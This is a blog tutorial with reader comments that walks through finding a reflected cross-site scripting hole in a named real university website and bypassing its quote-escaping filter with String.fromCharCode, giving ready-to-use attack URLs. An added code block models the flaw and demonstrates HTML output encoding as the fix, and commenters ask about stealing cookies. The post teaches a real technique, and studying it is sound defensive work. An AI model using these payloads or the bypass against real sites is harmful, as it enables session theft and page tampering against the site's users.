XSS and BYPASSING A FILTER

I hope you have already heard about Cross Site Scripting, known as XSS. I have focused on finding an XSS hole and bypassing a filter. XSS is a web application vulnerability that occurs due to improper or no filtering of user input. It enables malicious attackers to inject client-side script into web pages.
This tutorial is for educational purposes and to make people aware of such a threat. I recommend that readers proceed with this post only if they abide by the blog's Disclaimer; otherwise, leave this page immediately.
You might have tried finding an XSS hole by inserting a script like this
<script>alert('XSS')</script> in search fields and hoping for a box to pop up saying XSS. But that's not always the way to find an XSS bug.

This example will make everything clear.

Okay, go to this URL

http://www.chitkara.edu.in/chitkara/esl.php?page=overview.php&sitetitle=Overview

Let's replace 'Overview' with any keyword, say 'test',
and hit enter

http://www.chitkara.edu.in/chitkara/esl.php?page=overview.php&sitetitle=test

Now check the source code of the page and search for the keyword 'test' using Ctrl+F,
and we can find it in the code.


Look carefully at where it got inserted in the source code

<title>Chitkara Educational Trust > test</title>

Now let's replace 'test' with </title><h1>XSS</h1> and see what happens

Note: <h1> is the HTML heading tag.

http://www.chitkara.edu.in/chitkara/esl.php?page=overview.php&sitetitle=</title><h1>XSS</h1>

We can see the keyword 'XSS' displayed on the webpage.

Let's look at the page source again

We entered </title> to close the title tag ( <title> ), and <h1>XSS</h1> is the actual HTML tag we wanted to see on the page.

I hope it was a simple part and is clear to you.

Now let's try to execute JavaScript code: <script>alert('XSS')</script>. A popup message box saying XSS should appear on the webpage.
Let's go to this URL

http://www.chitkara.edu.in/chitkara/esl.php?page=overview.php&sitetitle=</title><script>alert('XSS')</script>

But nothing happens!

Now check the source code again.
See the backslashes ( \ ) automatically inserted before the single quotes ( ' ) we entered. Because of this, our code didn't execute. This is a kind of filter that we need to bypass.

Here we will use a built-in JavaScript function called String.fromCharCode(), which builds a string from character codes. Now both these codes

<script>alert('XSS')</script> and <script>alert(String.fromCharCode(88, 83, 83))</script>
have the same effect, but we can see that there are no quotes in the second one.

Note: 88 and 83 are the ASCII values for X and S respectively. Visit http://www.asciitable.com for more.

Finally, try this

http://www.chitkara.edu.in/chitkara/esl.php?page=overview.php&sitetitle=</title><script>alert(String.fromCharCode(88, 83, 83))</script>

Yes, it worked.
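Why the quote filter did not help, and what does, as an added example that is not part of the original post or the site's own code. The title template and all function names are assumptions that model the server-side output in JavaScript; the inputs are the ones used in the steps above.

```javascript
// Added example: models the <title> injection point from this post (constructed).

// The filter observed in the post: a backslash is put before quotes.
function addSlashes(s) {
  return s.replace(/(['"\\])/g, '\\$1');
}

// The fix: encode HTML metacharacters so the value stays text in HTML context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical template standing in for the page's title line.
function renderTitle(siteTitle, filter) {
  return '<title>Chitkara Educational Trust > ' + filter(siteTitle) + '</title>';
}

// True when the value closed the title element early, i.e. markup was injected.
function breaksOutOfTitle(html) {
  const firstClose = html.toLowerCase().indexOf('</title>');
  return firstClose !== html.length - '</title>'.length;
}

// The original value plus the three inputs tried in the post.
const inputs = [
  'Overview',
  '</title><h1>XSS</h1>',
  "</title><script>alert('XSS')</script>",
  '</title><script>alert(String.fromCharCode(88, 83, 83))</script>',
];

// One boolean per input: did it escape the title element under this filter?
function audit(filter) {
  return inputs.map((v) => breaksOutOfTitle(renderTitle(v, filter)));
}

console.log('addSlashes:', audit(addSlashes)); // quote escaping only
console.log('escapeHtml:', audit(escapeHtml)); // HTML output encoding
```

Backslash-escaping quotes is meant for string literals, not HTML output, so every tag still lands in the page; encoding < and > at output time keeps all three inputs inside the title as plain text.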

I hope you liked this demo :)

By Aneesh M. Makker, an ethical hacking enthusiast from the engineering department of Punjabi University.

10 comments:

Anonymous said...

Great job man. Please also write on stealing cookies using XSS

Shubham said...

Step by step, clearly got it. Thanks guys

Aneesh said...

Thanks friends, keep visiting :)

Shekhar Sahu on October 4, 2010 at 9:07 PM said...

Very useful :p

Ramkumar on October 15, 2010 at 10:23 PM said...

Great detailed guide. This is my first visit to your blog. I have a suggestion to make: can you kindly increase the font size by a few pixels? It's very small on a wide screen

Aneesh said...

Thanks Ramkumar :)

Anonymous said...

Thanks, but what should be the next step, bro... the main step... XSS takes place on many sites, but this is only the half part... what should be done after getting a site vulnerable... can we get in... if yes, then how? Waiting...

Aneesh said...

These kinds of XSS holes can be exploited to inject iframes or steal sessions. Simply, they are giving you the chance to inject client-side scripts. Now it's up to you how you proceed. Moreover, such posts are meant to make you aware of vulnerabilities and fixing them, not for hacking purposes. :)

ashwin on December 1, 2010 at 10:06 PM said...

Nice tutorial Aneesh, would have been better with an introduction and more explanation. Also please create proper links; I had to type in all the URLs because of security, of course you can crack this.

Faisal Ahmed on November 12, 2012 at 3:35 PM said...

Thanks for this tutorial.


 
© 2013 SecurityHunk All Rights Reserved and Template by Fresh Blogger Templates